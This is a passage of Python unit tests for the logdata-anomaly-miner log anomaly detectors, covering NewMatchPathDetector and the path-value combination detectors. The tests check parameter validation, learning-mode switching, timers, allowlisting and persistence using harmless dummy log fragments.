1, persistence_id=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, persistence_id="Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=b"True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag="True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, allow_missing_values_flag=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=b"True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode="True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=None) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=b"True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline="True") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, output_logline=True) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=100) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchIdValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=set()) NewMatchIdValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], ids, 1, log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchPathDetectorTest.py000066400000000000000000000431321500476301700310350ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom import time from datetime import datetime from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class NewMatchPathDetectorTest(TestBase): """Unittests for the NewMatchPathDetector.""" match_context1 = DummyMatchContext(b" pid=") fdme1 = DummyFixedDataModelElement("s1", b" pid=") match_element1 = fdme1.get_match_element("", match_context1) match_context2 = DummyMatchContext(b"25537 uid=2") fdme2 = DummyFixedDataModelElement("d1", b"25537") match_element2 = fdme2.get_match_element("", match_context2) def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s New path(s) detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # learn_mode = True nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpd) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpd) self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), nmpd.__class__.__name__, 1, "['/s1']")) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # learn_mode = False nmpd.learn_mode = False self.assertTrue(nmpd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), nmpd.__class__.__name__, 1, "['/d1']")) self.reset_output_stream() # repeating should produce the same result self.assertTrue(nmpd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), nmpd.__class__.__name__, 1, "['/d1']")) # stop_learning_time nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(nmpd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertTrue(nmpd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertFalse(nmpd.learn_mode) # stop_learning_no_anomaly_time nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(nmpd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertTrue(nmpd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(nmpd.receive_atom(log_atom2)) self.assertTrue(nmpd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertTrue(nmpd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertFalse(nmpd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = time.time() nmpd.next_persist_time = t + 400 self.assertEqual(nmpd.do_timer(t + 200), 200) self.assertEqual(nmpd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(nmpd.do_timer(t + 999), 1) self.assertEqual(nmpd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) analysis = "Analysis.%s" log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpd) nmpd.receive_atom(log_atom1) self.assertRaises(Exception, nmpd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The NewMatchPathDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, nmpd.allowlist_event, analysis % nmpd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(nmpd.allowlist_event(analysis % nmpd.__class__.__name__, self.match_element1.path, None), "Allowlisted path(s) %s in %s." % (self.match_element1.path, analysis % nmpd.__class__.__name__)) self.assertEqual(nmpd.known_path_set, {"/s1"}) nmpd.learn_mode = False self.assertEqual(nmpd.allowlist_event(analysis % nmpd.__class__.__name__, self.match_element2.path, None), "Allowlisted path(s) %s in %s." % (self.match_element2.path, analysis % nmpd.__class__.__name__)) self.assertEqual(nmpd.known_path_set, {"/s1", "/d1"}) def test4persistence(self): """Test the do_persist and load_persistence_data methods.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpd) log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpd) self.assertTrue(nmpd.receive_atom(log_atom1)) self.assertTrue(nmpd.receive_atom(log_atom2)) self.assertEqual(nmpd.known_path_set, {"/s1", "/d1"}) nmpd.do_persist() with open(nmpd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '["string:/d1", "string:/s1"]') nmpd.known_path_set = set() nmpd.load_persistence_data() self.assertEqual(nmpd.known_path_set, {"/s1", "/d1"}) other = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) self.assertEqual(nmpd.known_path_set, other.known_path_set) def test5validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, None) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, "") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, 123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, ()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, set()) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], output_logline=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchPathDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/NewMatchPathValueComboDetectorTest.py000066400000000000000000000633311500476301700330150ustar00rootroot00000000000000import unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.input.LogAtom import LogAtom import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement from datetime import datetime from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class NewMatchPathValueComboDetectorTest(TestBase): """Unittests for the NewMatchPathValueComboDetector.""" match_context = DummyMatchContext(b" pid=25537 uid=2") fdme1 = DummyFixedDataModelElement("s1", b" pid=") fdme2 = DummyFixedDataModelElement("d1", b"25537") seq1 = DummySequenceModelElement("seq", [fdme1, fdme2]) match_element1 = seq1.get_match_element("", match_context) match_context = DummyMatchContext(b"ddd 25538ddd ") fdme3 = DummyFixedDataModelElement("s1", b"ddd ") fdme4 = DummyFixedDataModelElement("d1", b"25538") seq2 = DummySequenceModelElement("seq", [fdme3, fdme4]) match_element2 = seq2.get_match_element("", match_context) match_element3 = fdme3.get_match_element("/seq", match_context) match_context = DummyMatchContext(b"ddd 25538ddd ") fdme5 = DummyFixedDataModelElement("s1", b"ddd ") fdme6 = OptionalMatchModelElement("o", DummyFixedDataModelElement("d1", b"25539")) seq3 = DummySequenceModelElement("seq", [fdme5, fdme6]) match_element4 = seq3.get_match_element("", match_context) match_element5 = fdme5.get_match_element("/seq", match_context) def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s New value combination(s) detected\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" # learn_mode = True nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, nmpvcd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, nmpvcd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, nmpvcd) self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b' pid=', b'25537')")) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # learn_mode = False nmpvcd.learn_mode = False self.assertTrue(nmpvcd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b'ddd ', b'25538')")) self.reset_output_stream() # repeating should produce the same result self.assertTrue(nmpvcd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b'ddd ', b'25538')")) self.reset_output_stream() # allow_missing_values_flag=True nmpvcd.allow_missing_values_flag = True self.assertTrue(nmpvcd.receive_atom(log_atom3)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpvcd.__class__.__name__, 1, "(b'ddd ', None)")) # stop_learning_time nmpvcd = NewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(nmpvcd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertTrue(nmpvcd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(nmpvcd.receive_atom(log_atom1)) self.assertFalse(nmpvcd.learn_mode) # stop_learning_no_anomaly_time nmpvcd = 